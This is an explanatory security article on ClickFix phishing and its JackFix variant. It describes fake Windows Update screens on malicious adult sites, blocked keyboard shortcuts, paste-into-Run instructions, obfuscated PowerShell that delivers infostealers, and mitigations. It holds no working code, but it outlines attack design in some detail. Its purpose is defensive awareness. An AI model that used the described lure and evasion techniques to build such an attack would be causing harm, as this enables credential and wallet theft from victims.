A ClickFix attack is a type of phishing or social engineering technique designed to trick users into executing malicious commands directly on their Windows computers. It typically involves displaying a fake error message or technical issue (e.g., a pop-up claiming a system problem like a corrupted file or security alert). The message then instructs the victim to “fix” the issue by copying and pasting a provided string of code into the Windows Run dialog (accessible via Win+R). This code often downloads and installs malware, such as infostealers or trojans, bypassing traditional antivirus detection because the execution happens through legitimate OS features.
These attacks rely on creating a sense of urgency or confusion without overwhelming pressure, making the action seem like a logical troubleshooting step. They are commonly spread via malvertising, compromised websites, or email links.
What is JackFix?
JackFix is a more advanced and aggressive variant of the ClickFix attack, first observed in late November 2025. It builds on the core ClickFix method but incorporates heightened psychological manipulation to increase success rates. The name “JackFix” is a play on “hijack” (due to the screen takeover) combined with “ClickFix.”
How JackFix Works
1. Initial Lure: Victims are directed to fake adult (pornography) websites via malvertising or phishing links. These sites mimic legitimate platforms but are controlled by attackers.
2. Screen Hijacking: Once the user interacts (e.g., clicks play on a video), a full-screen overlay appears, impersonating a critical Windows Update or security patch screen. This includes:
• A realistic progress bar, loading animation, and error messages (e.g., “Update failed – requires manual intervention”).
• Blocked keyboard shortcuts (like Alt+Tab or Ctrl+Alt+Del) to prevent easy escape, creating a “locked” feeling similar to older ransomware screen lockers.
3. Manipulation Phase: The fake update instructs the user to “resolve” the issue by running specific commands in the Windows Run dialog or PowerShell. This includes granting admin privileges and disabling security features like Microsoft Defender exclusions.
4. Malware Delivery: Upon compliance, a heavily obfuscated PowerShell script downloads and executes up to eight malware samples in a “spray and pray” approach. The script uses runtime reconstruction of commands (e.g., encoding JavaScript into arrays) to evade static analysis tools.
This creates intense anxiety, making users more likely to follow instructions without questioning them.
Key Differences from Traditional ClickFix
• Pressure Tactics: ClickFix uses mild prompts; JackFix employs full-screen locks and anxiety-inducing visuals for stronger coercion.
• Evasion Techniques: JackFix URLs redirect benign direct visitors (e.g., to Google) but only serve malware via the attack chain, complicating detection. It also dynamically rebuilds malicious code in memory.
• Effectiveness: Early reports suggest higher infection rates due to the immersive lure and context (e.g., tying the “fix” to a believable update failure).
Targets and Scope
• Primarily individual users browsing adult content, with infections reported in the US and Europe.
• Attributed to Russian-speaking cybercriminals, active as of November 25, 2025.
Malware Involved
JackFix delivers a mix of commercial off-the-shelf malware, including:
• Infostealers: Raccoon, Vidar 2.0, RedLine.
• Loaders/Droppers: Amadey and others. This allows attackers to steal credentials, browser data, and crypto wallets.
Mitigations and Advice
• Disable Run Dialog: Use Group Policy (gpedit.msc) to restrict access for non-admin users if unnecessary.
• Browser Protections: Limit full-screen mode via extensions or settings (e.g., in Chrome/Edge).
• General Best Practices: Avoid suspicious sites, enable real-time antivirus scanning, keep Windows updated via official channels, and use ad-blockers. If you encounter a suspicious pop-up, close the browser via Task Manager instead of interacting.
• Security tools like Microsoft Defender may detect some payloads, but behavioral monitoring is key for these social engineering attacks.
This campaign highlights evolving threats in malvertising—stay vigilant, especially on high-risk sites.